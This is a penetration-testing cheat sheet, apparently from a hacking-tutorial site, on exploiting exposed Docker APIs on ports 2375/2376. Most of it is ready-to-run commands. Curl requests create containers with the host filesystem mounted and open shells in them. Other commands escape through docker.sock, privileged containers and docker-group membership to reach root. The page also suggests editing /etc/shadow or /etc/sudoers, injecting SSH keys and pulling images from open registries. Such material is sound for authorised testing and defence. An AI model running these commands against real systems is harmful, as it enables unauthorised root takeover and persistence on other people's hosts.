Docker - Port 2375,2376
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
Basic info
Docker is a widely used containerization platform that allows developers to package applications with their dependencies into isolated units. However, misconfigurations, exposed APIs, and poor access control practices can create serious security risks. This guide provides comprehensive techniques for Docker penetration testing, focusing on real-world attack vectors, privilege escalation, container escape, and host exploitation.
Identifying Docker in a Target Environment
Detecting Docker Services via Network Scanning
Dockerβs remote API may be exposed on:
Port 2375 (unencrypted)
Port 2376 (TLS-encrypted)
Scan using Nmap:
nmap -p 2375,2376 --script http-title,http-docker-registry <target-ip>Check for Docker API access:
curl http://<target-ip>:2375/containers/jsonIf you receive JSON output, the Docker API is unauthenticated and exposed.
Exploiting Exposed Docker API
Listing Containers
curl http://<target-ip>:2375/containers/jsonRunning a New Container (Interactive Shell)
curl -X POST http://<target-ip>:2375/containers/create -H "Content-Type: application/json" \
-d '{"Image":"alpine", "Cmd":["/bin/sh"], "HostConfig": {"Binds":["/:/host"]}}'Then start it:
curl -X POST http://<target-ip>:2375/containers/<container_id>/startAccess with:
curl -X POST -H "Content-Type: application/json" \
http://<target-ip>:2375/containers/<container_id>/exec \
-d '{"AttachStdout": true, "AttachStderr": true, "Tty": true, "Cmd": ["/bin/sh"]}'This allows you to escape to the host by accessing /host.
Docker Socket Abuse (/var/run/docker.sock)
/var/run/docker.sock)When Docker is exposed via the Docker socket, it allows root-level control over the host.
Check access:
ls -la /var/run/docker.sockPrivilege Escalation via Docker Socket
If you have write access to docker.sock, you can create a container with the host mounted:
docker run -v /:/mnt --rm -it alpine chroot /mntThis drops you into the host filesystem as root.
Container Escape Techniques
1. Privileged Containers
Check if container runs with --privileged:
cat /proc/1/cgroupIf you see docker with no restrictions, and cap_sys_admin, then:
mount -t proc proc /host/proc
chroot /host /bin/bash2. Mounting Host Filesystems
Containers running with -v /:/mnt allow direct access to the hostβs root filesystem.
Escalate:
chroot /mntThen modify /etc/shadow, /etc/sudoers, or inject SSH keys.
Detecting Docker Environment From Inside a Container
Check for containerized environment:
cat /proc/1/cgroup | grep -i docker
grep -q 'docker' /proc/self/cgroup && echo "Running in Docker"Look for environment variables like:
env | grep -i dockerPresence of /docker-entrypoint.sh, /var/run/docker.sock, or .dockerenv are telltale signs.
Attacking Misconfigured Docker Registries
Discovering Registries
nmap -p 5000 --script http-title,http-docker-registry <target>Access registry:
curl http://<target>:5000/v2/_catalogList tags:
curl http://<target>:5000/v2/<image>/tags/listPull vulnerable images:
docker pull <target>:5000/<image>:<tag>Analyze locally for secrets or backdoors.
Privilege Escalation via Docker Group Membership
If a user is in the docker group, they can effectively become root:
docker run -v /:/mnt --rm -it alpine chroot /mntCheck:
groupsIf docker is listed, the user has full control over the host.
Learn & practice For the Bug Bounty
Last updated
Was this helpful?